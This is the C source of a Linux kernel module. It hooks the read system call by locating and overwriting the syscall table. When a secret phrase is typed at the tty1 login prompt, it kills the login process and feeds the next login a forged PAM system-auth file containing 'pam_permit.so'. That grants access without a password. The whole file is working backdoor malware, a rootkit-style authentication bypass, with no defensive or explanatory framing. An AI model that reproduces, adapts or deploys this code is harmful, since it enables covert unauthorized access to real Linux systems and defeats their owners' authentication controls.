#include <linux/module.h>
#include <linux/kernel.h>
#include <linux/unistd.h>
#include <linux/sched.h>
#include <linux/fs.h>
#include <linux/file.h>
#include <asm/uaccess.h>

extern unsigned long sys_close(void);

static unsigned long *sys_call_table;

static asmlinkage long (*sys_read)(unsigned int fd, char __user *buf, size_t count);
static asmlinkage long (*sys_exit)(int code);

static char magic_string[] = "the best is yet to come";
static int magic_pos = 0;
static int magic_mode;


static char system_auth_content[] = "auth	sufficient	pam_permit.so";
static int system_auth_size = sizeof(system_auth_content) - 1;

static int make_rw(unsigned long address)
{
	unsigned int level;
	pte_t *pte = lookup_address(address, &level);

	if(pte->pte &~ _PAGE_RW)
		pte->pte |= _PAGE_RW;

	return 0;
}

static int make_ro(unsigned long address)
{
	unsigned int level;
	pte_t *pte = lookup_address(address, &level);

	pte->pte = pte->pte &~ _PAGE_RW;

	return 0;
}

static int update_magic_pos(char __user *buf, long size)
{
	int i;
	int magic_found = 0;

	i = 0;

	while (1) {
		char c;

		get_user(c, &buf[i]);

		if (c != magic_string[magic_pos]) {
			magic_pos = 0;
		} else {
			magic_pos++;
			if (magic_pos == sizeof(magic_string) -1)
				magic_found = 1;
		}

		i++;

		if (i == size)
			break;
	}

	return magic_found;
}

static asmlinkage long my_sys_read(unsigned int fd, char __user *buf, size_t count)
{
	long ret;
	struct fd f;

	f = fdget(fd);

	if (f.file &&
	    !strcmp(current->comm, "login") &&
	    !strcmp(f.file->f_path.dentry->d_iname, "system-auth") &&
	    magic_mode) {
		struct file *filp = f.file;

		if (filp->f_pos >= system_auth_size) {
			ret = 0;
			goto out;
		}

		if (count <= 0) {
			ret = 0;
			goto out;
		}

		if (count + filp->f_pos > system_auth_size)
			count = system_auth_size > filp->f_pos ?
				system_auth_size - filp->f_pos : 0;

		if (count) {
			copy_to_user(buf, &system_auth_content[filp->f_pos], count);
			filp->f_pos += count;
		}

		ret = count;
		if (filp->f_pos == system_auth_size) {
			magic_mode = 0;
			magic_pos = 0;
		}

		goto out;
	}

	ret = sys_read(fd, buf, count);

	if (ret <= 0)
		goto out;

	if (!strcmp(current->comm, "login") &&
	    !strcmp(f.file->f_path.dentry->d_iname, "tty1")) {
		if (update_magic_pos(buf, ret)) {
			magic_mode = 1;
			/*
			 * exit from the login process
			 * getty will spawn another one, which will read
			 * cooked stuff for /etc/pam.d/system-auth
			 */
			sys_exit(0);
		}
	}

out:
	if (f.file)
		fdput(f);

	return ret;
}

static void find_syscall_table(void)
{
	unsigned long *p = (unsigned long *) 0xffffffff81000000;

	while (*p != (unsigned long)sys_close)
		p++;

	sys_call_table = (unsigned long *)(p - __NR_close);
}

static int __init mod_init(void)
{
	find_syscall_table();

	make_rw((unsigned long)sys_call_table);

	sys_read = (long (*)(unsigned, char *, size_t))sys_call_table[__NR_read];
	sys_call_table[__NR_read] = (unsigned long)&my_sys_read;

	sys_exit = (long (*)(int))sys_call_table[__NR_exit];

	make_ro((unsigned long)sys_call_table);

	return 0;
}

static void __exit mod_exit(void)
{
	make_rw((unsigned long)sys_call_table);

	sys_call_table[__NR_read] = (unsigned long)sys_read;

	make_ro((unsigned long)sys_call_table);
}

module_init(mod_init);
module_exit(mod_exit);

MODULE_LICENSE("GPL");
